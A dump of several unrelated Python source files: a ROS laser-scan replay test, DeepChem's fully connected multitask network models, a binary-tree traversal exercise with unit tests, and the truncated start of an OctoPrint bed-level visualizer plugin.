for f in [f for f in os.listdir(dir) if re.match(".*bag", f)]:
bags.append(self.load_bag(dir, f))
return bags
def load_bag(self, dir, name):
return rosbag.Bag(os.path.join(dir, name))
def test_scan(self):
bags = self.load_bags("set4")
for bag in bags:
rospy.loginfo("testing {}".format(bag))
count = 0
for topic, msg, t in bag.read_messages(topics=['/scan', '/tf', '/tf_static']):
if rospy.is_shutdown():
return
if topic == "/scan":
if count > 0:
count -=1
continue
msg.header.stamp = rospy.get_rostime()
pub.publish(msg)
rospy.sleep(duration)
if topic == "/tf":
global tf_buffer
process_tf(msg, tf_buffer)
if topic == "/tf_static":
global tfs_buffer
process_tf(msg, tfs_buffer)
pass
self.assertTrue(True)
tf_buffer = {}
tfs_buffer = {}
def process_tf(msg, buffer):
lock = threading.Lock()
lock.acquire()
for t in msg.transforms:
key = "{}-{}".format(t.header.frame_id, t.child_frame_id)
buffer[key] = t
lock.release()
def tf_publisher():
rate = rospy.Rate(20)
while not rospy.is_shutdown():
lock = threading.Lock()
lock.acquire()
if len(tfs_buffer) > 0:
msg_static = tf2_msgs.msg.TFMessage()
for key in tfs_buffer:
tfs = tfs_buffer[key]
tfs.header.stamp = rospy.get_rostime()
msg_static.transforms.append(tfs)
pubtfs.publish(msg_static)
tfs_buffer.clear()
msg = tf2_msgs.msg.TFMessage()
for key in tf_buffer:
tf = tf_buffer[key]
tf.header.stamp = rospy.get_rostime()
msg.transforms.append(tf)
pubtf.publish(msg)
lock.release()
rate.sleep()
if __name__ == "__main__":
import rosunit
rospy.init_node("test_laser")
pub = rospy.Publisher("/scan", sensor_msgs.msg.LaserScan, queue_size=10, latch=True)
pubtf = rospy.Publisher("/tf", tf2_msgs.msg.TFMessage, queue_size=100, latch=True)
pubtfs = rospy.Publisher("/tf_static", tf2_msgs.msg.TFMessage, queue_size=100, latch=True)
thread = threading.Thread(target=tf_publisher)
thread.start()
duration = rospy.get_param("~duration", 3)
rosunit.unitrun(PKG, 'test_laser', TestLaser)
|
fcnet.py
|
"""TensorFlow implementation of fully connected networks.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import warnings
import time
import numpy as np
import tensorflow as tf
import threading
import collections
import deepchem as dc
from deepchem.nn import model_ops
from deepchem.utils.save import log
from deepchem.metrics import to_one_hot, from_one_hot
from deepchem.models.tensorflow_models import TensorflowGraph
from deepchem.models.tensorflow_models import TensorflowGraphModel
from deepchem.models.tensorflow_models import TensorflowClassifier
from deepchem.models.tensorflow_models import TensorflowRegressor
from deepchem.metrics import to_one_hot
from deepchem.models.tensorgraph.tensor_graph import TensorGraph, TFWrapper
from deepchem.models.tensorgraph.layers import Feature, Label, Weights, WeightedError, Dense, Dropout, WeightDecay, Reshape, SoftMaxCrossEntropy, L2Loss, ReduceSum
class MultiTaskClassifier(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
n_classes=2,
**kwargs):
"""Create a MultiTaskClassifier.
In addition to the following arguments, this class also accepts all the keywork arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes). Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
bias_init_consts: list or loat
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
the dropout probablity to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
n_classes: int
the number of classes
"""
super(MultiTaskClassifier, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
self.n_classes = n_classes
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * n_layers
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * n_layers
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, n_classes),
in_layers=[
Dense(in_layers=[prev_layer], out_channels=n_tasks * n_classes)
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, n_classes))
weights = Weights(shape=(None, n_tasks))
loss = SoftMaxCrossEntropy(in_layers=[labels, output])
weighted_loss = WeightedError(in_layers=[loss, weights])
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = to_one_hot(y_b.flatten(),
self.n_classes).reshape(
-1, self.n_tasks,
self.n_classes)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_proba(self, dataset, transformers=[], outputs=None):
return super(MultiTaskClassifier, self).predict(dataset, transformers,
outputs)
def predict(self, dataset, transformers=[], outputs=None):
"""
Uses self to make predictions on provided Dataset object.
Parameters
----------
dataset: dc.data.Dataset
Dataset to make prediction on
transformers: list
List of dc.trans.Transformers.
outputs: object
If outputs is None, then will assume outputs = self.outputs[0] (single
output). If outputs is a Layer/Tensor, then will evaluate and return as a
single ndarray. If outputs is a list of Layers/Tensors, will return a list
of ndarrays.
Returns
-------
y_pred: numpy ndarray or list of numpy ndarrays
"""
# Results is of shape (n_samples, n_tasks, n_classes)
retval = super(MultiTaskClassifier, self).predict(dataset, transformers,
outputs)
# retval is of shape (n_samples, n_tasks)
return np.argmax(retval, axis=2)
class MultiTaskRegressor(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
**kwargs):
"""Create a MultiTaskRegressor.
In addition to the following arguments, this class also accepts all the keywork arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes)+1. The final element corresponds to the output layer.
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
bias_init_consts: list or float
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes)+1.
The final element corresponds to the output layer. Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
the dropout probablity to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
"""
super(MultiTaskRegressor, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * (n_layers + 1)
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * (n_layers + 1)
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, 1),
in_layers=[
Dense(
in_layers=[prev_layer],
out_channels=n_tasks,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer,
stddev=weight_init_stddevs[-1]),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_init_consts[-1]))
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, 1))
weights = Weights(shape=(None, n_tasks))
weighted_loss = ReduceSum(L2Loss(in_layers=[labels, output, weights]))
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
class MultiTaskFitTransformRegressor(MultiTaskRegressor):
"""Implements a MultiTaskRegressor that performs on-the-fly transformation during fit/predict.
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
fit_transformers=[],
n_evals=1,
batch_size=50,
**kwargs):
"""Create a MultiTaskFitTransformRegressor.
In addition to the following arguments, this class also accepts all the keywork arguments
from MultiTaskRegressor.
Parameters
----------
n_tasks: int
number of tasks
n_features: list or int
number of features
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
Number of evalations per example at predict time
"""
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
super(MultiTaskFitTransformRegressor, self).__init__(
n_tasks, n_features, batch_size=batch_size, **kwargs)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
if not predict:
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_on_generator(self, generator, transformers=[], outputs=None):
def transform_generator():
for feed_dict in generator:
X = feed_dict[self.features[0]]
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
feed_dict[self.features[0]] = X_t
yield feed_dict
return super(MultiTaskFitTransformRegressor, self).predict_on_generator(
transform_generator(), transformers, outputs)
class TensorflowMultiTaskClassifier(TensorflowClassifier):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskClassifier is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
n_features = self.n_features
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = model_ops.multitask_logits(layer, self.n_tasks)
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = to_one_hot(y_b[:, task])
else:
# Dummy placeholders
orig_dict["labels_%d" % task] = np.squeeze(
to_one_hot(np.zeros((self.batch_size,))))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskRegressor(TensorflowRegressor):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskRegressor is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
n_features = self.n_features
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = []
for task in range(self.n_tasks):
output.append(
tf.squeeze(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, 1],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(value=bias_init_consts[i],
shape=[1]))))
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = y_b[:, task]
else:
# Dummy placeholders
orig_dict["labels_%d" % task] = np.squeeze(np.zeros((self.batch_size,)))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskFitTransformRegressor(TensorflowMultiTaskRegressor):
"""Implements a TensorflowMultiTaskRegressor that performs on-the-fly transformation during fit/predict
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
logdir=None,
layer_sizes=[1000],
weight_init_stddevs=[.02],
bias_init_consts=[1.],
penalty=0.0,
penalty_type="l2",
dropouts=[0.5],
learning_rate=0.002,
momentum=.8,
optimizer="adam",
batch_size=50,
fit_transformers=[],
n_evals=1,
verbose=True,
seed=None,
**kwargs):
"""Initialize TensorflowMultiTaskFitTransformRegressor
Parameters
----------
n_tasks: int
Number of tasks
n_features: list or int
Number of features.
logdir: str
Location to save data
layer_sizes: list
List of layer sizes.
weight_init_stddevs: list
List of standard deviations for weights (sampled from zero-mean
gaussians). One for each layer.
bias_init_consts: list
List of bias initializations. One for each layer.
penalty: float
Amount of penalty (l2 or l1 applied)
penalty_type: str
Either "l2" or "l1"
dropouts: list
List of dropout amounts. One for each layer.
learning_rate: float
Learning rate for model.
momentum: float
Momentum. Only applied if optimizer=="momentum"
optimizer: str
Type of optimizer applied.
batch_size: int
Size of minibatches for training.
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
Number of evalations per example at predict time
verbose: True
Perform logging.
seed: int
If not none, is used as random seed for tensorflow.
"""
warnings.warn("TensorflowMultiTaskFitTransformRegressor "
"is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
TensorflowGraphModel.__init__(
self,
n_tasks,
n_features,
logdir=logdir,
layer_sizes=layer_sizes,
weight_init_stddevs=weight_init_stddevs,
bias_init_consts=bias_init_consts,
penalty=penalty,
penalty_type=penalty_type,
dropouts=dropouts,
learning_rate=learning_rate,
momentum=momentum,
optimizer=optimizer,
batch_size=batch_size,
pad_batches=False,
verbose=verbose,
seed=seed,
**kwargs)
def fit(self,
dataset,
nb_epoch=10,
max_checkpoints_to_keep=5,
log_every_N_batches=50,
checkpoint_interval=10,
**kwargs):
"""Perform fit transformations on each minibatch. Fit the model.
Parameters
----------
dataset: dc.data.Dataset
Dataset object holding training data
nb_epoch: 10
Number of training epochs.
max_checkpoints_to_keep: int
Maximum number of checkpoints to keep; older checkpoints will be deleted.
log_every_N_batches: int
Report every N batches. Useful for training on very large datasets,
where epochs can take long time to finish.
checkpoint_interval: int
Frequency at which to write checkpoints, measured in epochs
Raises
------
AssertionError
If model is not in training mode.
"""
############################################################## TIMING
time1 = time.time()
############################################################## TIMING
log("Training for %d epochs" % nb_epoch, self.verbose)
with self.train_graph.graph.as_default():
train_op = self.get_training_op(self.train_graph.graph,
self.train_graph.loss)
with self._get_shared_session(train=True) as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=max_checkpoints_to_keep)
# Save an initial checkpoint.
saver.save(sess, self._save_path, global_step=0)
# Define the code that runs on a separate thread to feed data into the queue.
def enqueue(sess, dataset, nb_epoch, epoch_end_indices):
index = 0
for epoch in range(nb_epoch):
for X_b, y_b, w_b, ids_b in dataset.iterbatches(
self.batch_size, pad_batches=self.pad_batches):
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict = self.construct_feed_dict(X_b, y_b, w_b, ids_b)
sess.run(self.train_graph.graph.enqueue, feed_dict=feed_dict)
index += 1
epoch_end_indices.append(index)
sess.run(self.train_graph.graph.queue.close())
epoch_end_indices = []
enqueue_thread = threading.Thread(
target=enqueue, args=[sess, dataset, nb_epoch, epoch_end_indices])
enqueue_thread.daemon = True
enqueue_thread.start()
# Main training loop.
try:
epoch = 0
index = 0
index_in_epoch = 0
avg_loss = 0.0
while True:
if index_in_epoch % log_every_N_batches == 0:
log("On batch %d" % index_in_epoch, self.verbose)
# Run training op.
fetches = self.train_graph.output + [
train_op, self.train_graph.loss
]
fetched_values = sess.run(fetches)
loss = fetched_values[-1]
avg_loss += loss
index += 1
index_in_epoch += 1
if len(epoch_end_indices) > 0 and index >= epoch_end_indices[0]:
# We have reached the end of an epoch.
if epoch % checkpoint_interval == checkpoint_interval - 1:
saver.save(sess, self._save_path, global_step=epoch)
avg_loss = float(avg_loss) / index_in_epoch
log('Ending epoch %d: Average loss %g' % (epoch, avg_loss),
self.verbose)
epoch += 1
index_in_epoch = 0
avg_loss = 0.0
del epoch_end_indices[0]
except tf.errors.OutOfRangeError:
# We have reached the end of the data.
pass
# Always save a final checkpoint when complete.
saver.save(sess, self._save_path, global_step=epoch + 1)
############################################################## TIMING
time2 = time.time()
print("TIMING: model fitting took %0.3f s" % (time2 - time1), self.verbose)
############################################################## TIMING
def predict_on_batch(self, X):
"""Return model output for the provided input. Each example is evaluated
self.n_evals times.
Restore(checkpoint) must have previously been called on this object.
Args:
dataset: dc.data.Dataset object.
Returns:
Tuple of three numpy arrays with shape n_examples x n_tasks (x ...):
output: Model outputs.
labels: True labels.
weights: Example weights.
Note that the output and labels arrays may be more than 2D, e.g. for
classifier models that return class probabilities.
Raises:
AssertionError: If model is not in evaluation mode.
ValueError: If output and labels are not both 3D or both 2D.
"""
X_evals = []
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
X_evals.append(X_t)
len_unpadded = len(X_t)
if self.pad_batches:
for i in range(self.n_evals):
X_evals[i] = pad_features(self.batch_size, X_evals[i])
if not self._restored_model:
self.restore()
with self.eval_graph.graph.as_default():
# run eval data through the model
n_tasks = self.n_tasks
outputs = []
with self._get_shared_session(train=False).as_default():
n_samples = len(X_evals[0])
for i in range(self.n_evals):
output = []
feed_dict = self.construct_feed_dict(X_evals[i])
data = self._get_shared_session(train=False).run(
self.eval_graph.output, feed_dict=feed_dict)
batch_outputs = np.asarray(data[:n_tasks], dtype=float)
# reshape to batch_size x n_tasks x ...
if batch_outputs.ndim == 3:
batch_outputs = batch_outputs.transpose((1, 0, 2))
elif batch_outputs.ndim == 2:
batch_outputs = batch_outputs.transpose((1, 0))
# Handle edge case when batch-size is 1.
elif batch_outputs.ndim == 1:
n_samples = len(X)
batch_outputs = batch_outputs.reshape((n_samples, n_tasks))
else:
raise ValueError('Unrecognized rank combination for output: %s' %
(batch_outputs.shape))
# Prune away any padding that was added
batch_outputs = batch_outputs[:n_samples]
output.append(batch_outputs)
outputs.append(np.squeeze(np.concatenate(output)))
outputs = np.mean(np.array(outputs), axis=0)
outputs = np.copy(outputs)
# Handle case of 0-dimensional scalar output
if len(outputs.shape) > 0:
return outputs[:len_unpadded]
else:
outputs = np.reshape(outputs, (1,))
return outputs
|
solution.py
|
# python3
from abc import ABC
from collections import namedtuple
from sys import setrecursionlimit, stdin
from threading import stack_size, Thread
from typing import AnyStr, IO, List
from unittest import TestCase
setrecursionlimit(10 ** 6)
stack_size(2 ** 27)
test = namedtuple('test', 'input expected')
class TreeOrders:
def __init__(self):
self.n = 0
self.key = self.left = self.right = None
def read(self, src: IO):
self.n = int(src.readline())
self.key = [0 for _ in range(self.n)]
self.left = [0 for _ in range(self.n)]
self.right = [0 for _ in range(self.n)]
for i in range(self.n):
[self.key[i], self.left[i], self.right[i]] = map(int, src.readline().split())
return self
def walk(self) -> List[List[int]]:
result, buf = [], [0 for _ in range(self.n)]
for walk in [self.in_order, self.pre_order, self.post_order]:
walk(buf)
result.append(buf[:])
return result
def in_order(self, buf: List[int], node: int = 0, position: int = 0) -> int:
if self.left[node] != -1:
position = self.in_order(buf, self.left[node], position)
buf[position] = self.key[node]
position += 1
if self.right[node] != -1:
position = self.in_order(buf, self.right[node], position)
return position
def pre_order(self, buf: List[int], node: int = 0, position: int = 0) -> int:
buf[position] = self.key[node]
position += 1
if self.left[node] != -1:
position = self.pre_order(buf, self.left[node], position)
if self.right[node] != -1:
position = self.pre_order(buf, self.right[node], position)
return position
def post_order(self, buf: List[int], node: int = 0, position: int = 0) -> int:
if self.left[node] != -1:
position = self.post_order(buf, self.left[node], position)
if self.right[node] != -1:
position = self.post_order(buf, self.right[node], position)
buf[position] = self.key[node]
position += 1
return position
class Fake(IO, ABC):
def __init__(self, rows: List[str]):
self.__i = -1
self.__rows = [str(len(rows))] + rows
def readline(self, limit: int = -1) -> AnyStr:
self.__i += 1
return self.__rows[self.__i]
class Test(TestCase):
def test_tree_orders(self):
tests = [
# samples
test([
'4 1 2',
'2 3 4',
'5 -1 -1',
'1 -1 -1',
'3 -1 -1',
], [
'1 2 3 4 5',
'4 2 1 3 5',
'1 3 2 5 4',
]),
test([
'0 7 2',
'10 -1 -1',
'20 -1 6',
'30 8 9',
'40 3 -1',
'50 -1 -1',
'60 1 -1',
'70 5 4',
'80 -1 -1',
'90 -1 -1',
], [
'50 70 80 30 90 40 0 20 10 60',
'0 70 50 40 30 80 90 20 60 10',
'50 80 90 30 40 70 10 60 20 0',
]),
]
for i, t in enumerate(tests):
src = Fake(t.input)
self.assertEqual(t.expected,
list(map(lambda way: ' '.join(str(step) for step in way), TreeOrders().read(src).walk())),
msg='at {} position'.format(i))
def main():
for way in TreeOrders().read(stdin).walk():
print(' '.join(str(step) for step in way))
if __name__ == '__main__':
Thread(target=main).start()
|
__init__.py
|
# coding=utf-8
from __future__ import absolute_import
import threading
import octoprint.plugin
from octoprint.events import Events
import re
import numpy as np
import logging
import flask
import json
class bedlevelvisualizer(
octoprint.plugin.StartupPlugin,
octoprint.plugin.TemplatePlugin,
octoprint.plugin.AssetPlugin,
